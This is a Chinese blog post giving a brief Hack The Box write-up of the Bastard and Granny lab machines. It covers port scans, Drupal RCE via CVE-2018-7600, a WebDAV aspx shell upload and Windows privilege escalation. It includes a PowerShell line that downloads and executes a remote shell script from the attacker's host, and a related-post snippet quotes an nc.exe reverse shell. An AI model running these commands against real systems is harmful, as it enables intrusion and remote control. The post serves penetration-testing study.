HTB-oscplike-Bastard+Granny

于 2022-04-05 23:07:19 发布
阅读量1.1k 收藏
点赞数
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_53302733/article/details/123979812
版权

HTB-oscplike-Bastard+Granny

Bastard

medium难度的bastard 靶机IP 10.10.10.9

sudo nmap -sC -sV -A -p- --min-rate=5000 -Pn 10.10.10.9
80/tcp open http Microsoft IIS httpd 7.5
135/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC

80看见 Powered by Drupal dirsearch扫出来changelog.txt 确定版本7.54
网上找到个好用的CVE-2018-7600直接可以rce
那就经典起个http 执行powershell -c “iex(new-object system.net.webclient).downloadstring(‘http://10.10.14.21:789/windowsshell.ps1’)”
拿到user的flag 64212fe194c2379dda8794d81c67434a

上传脚本扫提权洞 看见ms15-051可能可以
这里要注意只有连上来的目录有写权限 一旦顺手出去了就没权限拿东西过来了
用前两天的ms15-051 64位的弹回system 拿到flag
cea21849e111b1ea2f13debf2e6a36a1
请添加图片描述

Granny

easy难度的granny 靶机IP 10.10.10.15

sudo nmap -sS -sV -A -p- --min-rate=5000 -Pn 10.10.10.15
就个80 dirsearch扫了有aspnetclient 回过头发现80开了webdav
davtest --url http://10.10.10.15 发现txt文件是可以放上去执行的
那就msfvenom弄个aspx的shell 改成txt格式先
cadaver http://10.10.10.15 put asp.txt move cmdasp.txt asp.aspx
然后访问弹到nc

进去看到这台是2003的机器连powershell都没有 但是whoami /all发现了SeImpersonatePrivilege 那很明显可以劫持token提权
随便找个合适的脚本 msfvenom再弄个exe的shell kali开个smb服务
传个脚本过去执行我们的新shell 弹回system权限 打完

700c5dc163014e22b3e408f8703f67d1
aa4beed1c0584445ab463a6747bd06e9
请添加图片描述

ore0
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
HTB-Bastard
TA不懒,但还没有添加简介
04-07 443
HTB-Bastard
HTB靶场系列】Bastard
Ms08067安全实验室
07-28 226
点击星标,即时接收最新推文#01实验信息靶机:10.10.10.9Kali:10.10.16.2#02实验过程靶机打开的端口很少,接下来扫描端口的详细信息根据信息可以得出靶机是IIS搭建的,网站有robots.txt里面有很多可用信息接下来 再对靶机进行 常用漏洞脚本扫描 以及 常见UDP端口扫描,没有什么出现其他的可用信息那么这里的突破口就主要就是80端口通过刚刚nmap的扫描结果得出靶机用的是...
HTB靶场系列 Windows靶机 Granny靶机
m0_57221101的博客
01-29 1529
勘探 还是使用nmap进行侦擦 先大致扫描 nmap 10.10.10.15 Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-01 10:29 CST Nmap scan report for 10.10.10.15 Host is up (0.38s latency). Not shown: 999 filtered ports PORT STATE SERVICE 80/tcp open http Nmap done: 1 IP a
signature=e48117269aff62d4a3fa5fe5baffd0d1,webmidi/package-lock.json at 9a0881504e1d20784670f3ff30e2...
热门推荐
weixin_30768881的博客
05-30 3万+
{"name": "webmidi","version": "2.5.1","lockfileVersion": 1,"requires": true,"dependencies": {"@babel/code-frame": {"version": "7.0.0","resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-f...
oscp——HTB——Bastard
王嘟嘟的博客
05-20 548
0x00 前言 难度 入门1级 0x01 信息收集 0x02 Web——Webshell 这里访问之后看到是一个Drupal的站,Drupal的站在7.0可以直接直接getshell 使用脚本直接getshell 0x03 Webshell——Rootshell 传一个nc 上去然后反弹一个shell nc.exe -e cmd 10.10.14.6 1234 这里可以使用Sherlock先进行扫描。 powershell.exe -exec bypass -Command "& {Imp
shaper-scripts:示例防火墙 + HTB + IMQ
05-29
信息 ifconfig eth0: flags=4163<UP> mtu 1500 inet 192.168.120.160 网络掩码 255.255.255.0 广播 192.168.120.255 inet6:80:40ffab0c0c 前缀:80:40ffab0c00c 前缀:280:4000c0c e8:fa:b3 txqueuelen 1000 ...
HTB-Solutions
03-09
【标题】"HTB-Solutions" 提供的内容可能与网络安全平台 Hack The Box(HTB)有关,这通常指的是用户在该平台上完成的各种挑战的解决方案集。Hack The Box 是一个在线平台,让网络安全爱好者和专业人士可以通过解决...
qos-htb-开源
05-03
qos-htb是您一直在等待的简单带宽管理解决方案,graphix制作了图表,您可以在一秒钟之内查看到底谁在消耗带宽!
xml-HTB-开源
05-02
xml-HTB是用于自动生成bash脚本的工具,该工具可在Linux上设置HTB。 它使用xml配置文件。 它易于使用,具有许多功能:多种深度的类,可配置的叶子,u32和fw过滤器,可同时配置两个输入
ROS3.30 +HTB+DSCP-L7
10-11
ROS3.30 +HTB+DSCP-L7
hackthebox-granny(考点:webdav/windows)
冬萍子癸水
04-11 734
nmap 就80,上去看看,是个IIS但一片贫瘠,拿dirbuster扫也是一片荒凉 这说明信息搜集还没到位,还要再看看nmap的扫描 下面关于webdav的信息显示了很详细;那说明这应该就是突破口 webdav网上很多介绍。 对于webdav,我一般用这个工具。提示有些类型的文件可以放上去但有些不行。IIS需要的是aspx,但是不能传上去 davtest -url http://10.10....
Hack the box靶机 Bastard
菜浪马废的博客
06-03 291
修改几处地方 准备用nc连接
实验12 BGP路由属性
07-07 646
实验任务一:local_pref属性 建立物理连接 建立bgp邻居 [RTD]ip route-static 2.2.2.2 32 10.10.10.9 [RTD]ip route-static 3.3.3.3 32 10.10.10.9 [RTC]ip route-static 2.2.2.2 32 10.10.10.5 [RTC]ip route-static 4.4.4.4 ...
HTB系列之七:Bastard
Ms08067安全实验室
12-13 587
这次挑战的是 HTB 的第7台靶机Bastard技能收获:PHP UnserilaizeCMS Version IdentifyWindows privilege escalation...
[HTB]“Heist”靶机渗透详细思路
墨痕诉清风的博客
01-02 759
1.信息搜集2.寻找80端口信息泄漏的密码3.通过已知的用户枚举可能的用户名密码。4.寻找主机的其他用户5.5985端口的入侵以及拿shell6.找管理员操作进程,提取进程文件,拿到管理员密码,并拿shell。
No.53-HackTheBox-windows-Bastard-Walkthrough渗透学习
qq_34801745的博客
02-13 1012
** HackTheBox-windows-Bastard-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/6 靶机难度:中等(4.7/10) 靶机发布日期:2017年10月14日 靶机描述: Bastard is not overly challenging, however it requires some...
HTB系列】靶机Bitlab的渗透测试
Ms08067安全实验室
02-07 810
本文作者:是大方子(Ms08067实验室核心成员)﹀﹀﹀0x00 本文目录反思与总结基本信息渗透测试过程补充0x01 反思与总结1.curl发送GET参数化请求 2.对反弹回来的s...
HTB Beep[Hack The Box HTB靶场]writeup系列5
重新启程
02-04 3510
本题是retire机器的第五台了 目录 0x00 靶场信息 0x01 信息搜集 0x02 业务探测 80端口主页:elastix freepbx 80端口mail业务:roundcube webmail 10000端口:webmin 0x03 漏洞分析 elastix roundcube webmin 0x03 web攻击 roundcube webmin elas...
cozyhosting+htb
最新发布
09-20
CSDN AI助手(C知道):对于你提到的 "cozyhosting htb",我理解的是你在提及CTF平台Hack The Box中的CozyHosting机器。CozyHosting是一个涉及Web应用安全的挑战。你可能需要在Hack The Box平台上登录并进行相关操作...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值